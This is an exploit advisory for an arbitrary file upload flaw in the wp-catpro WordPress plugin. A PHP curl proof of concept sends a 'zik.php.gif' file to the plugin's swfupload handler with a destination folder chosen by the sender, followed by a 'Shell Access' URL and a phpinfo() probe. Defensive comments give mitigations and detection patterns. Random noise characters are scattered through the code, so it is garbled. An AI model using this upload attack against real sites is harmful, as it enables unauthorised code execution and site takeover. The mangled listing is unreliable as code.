WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
9 n* G# B! E. z$ r<?php1 b4 \* P( k6 w5 P
" \' t0 G% ^* @
// Proof-of-concept request quoted by the advisory. The listing is mangled by
// extraction noise (random characters before, after and inside the code, e.g.
// the "ucurl_setopt" below), so it is not runnable as printed; read it for the
// shape of the request, not as working code.
//
// Defender's reading of the request:
//   - the only fields sent are the file itself and a sender-chosen 'folder';
//     no session cookie, nonce or credential is attached, so the handler
//     presumably accepts unauthenticated uploads — TODO confirm in upload.php
//   - the file name ends in .gif (on the allowed-extension list quoted above)
//     but also contains ".php"; whether the web server then executes it as
//     PHP depends on its handler configuration — not established here
//   - the destination directory is taken from the request, i.e. the sender
//     picks where the file lands
// Mitigation: require an authenticated, capability-checked user and a nonce on
// the handler; validate the final extension only and reject multi-extension
// names; ignore the client-supplied folder; serve the uploads directory with
// script execution disabled. Detection: POSTs to
// .../wp-catpro/js/swfupload/js/upload.php and new files under
// wp-content/uploads/catpro/ whose name contains ".php.".

// Local file to upload; the name carries a double extension, matching the
// advisory's shell.php.gif example.
$uploadfile="zik.php.gif";
// Target: the plugin's bundled swfupload handler. The bracketed host and path
// are placeholders the advisory leaves to the reader.
5 {# [4 c+ o6 e, B5 P+ N' ^0 {9 H$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
9 o* ]1 |& e I8 q% B: {8 [3 ucurl_setopt($ch, CURLOPT_POST, true);/ c% E+ N% L; N7 b* v
// Multipart body: 'Filedata' is presumably the file field the handler reads;
// 'folder' is the destination directory and is supplied by the sender.
curl_setopt($ch, CURLOPT_POSTFIELDS,* V! R) c* H4 j) Y3 I" V
array('Filedata'=>"@$uploadfile",
1 d: t" ~1 `6 F; M1 A, Y$ J'folder'=>'/wp-content/uploads/catpro/'));/ v% W; u. [6 q5 @
// Capture the response body instead of echoing it, then print it: the
// handler's reply is the only feedback on whether the upload was accepted.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);; S9 Q' l# b4 [) `* F- C
$postResult = curl_exec($ch);/ H. Q4 R: k3 B' @6 J
curl_close($ch);( J8 U' G- D, s- l3 z
; v7 c7 E) \; \4 F! @2 lprint "$postResult";6 }2 I( F' g% C; g* V% o
! f% W5 m! }( U) y# x) {) J
// The advisory's note on where the stored file would be reachable. It sits
// inside the PHP tags here, so as printed this line is not valid PHP.
// "random_name" suggests the handler renames stored files — TODO confirm.
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 a& E% |' K( r3 ]/ ` ?>" o6 ?: l7 X% u7 v# N
<?php
// Body of the file the advisory uploads as a probe. phpinfo() dumps the PHP
// configuration, so a rendered configuration page in the response shows the
// ".php.gif" file was executed server-side rather than served as an image.
// (Extraction noise precedes the call and follows the closing tag.)
7 _* V+ d- B! w9 g9 dphpinfo();
Z n; c* }1 b?> |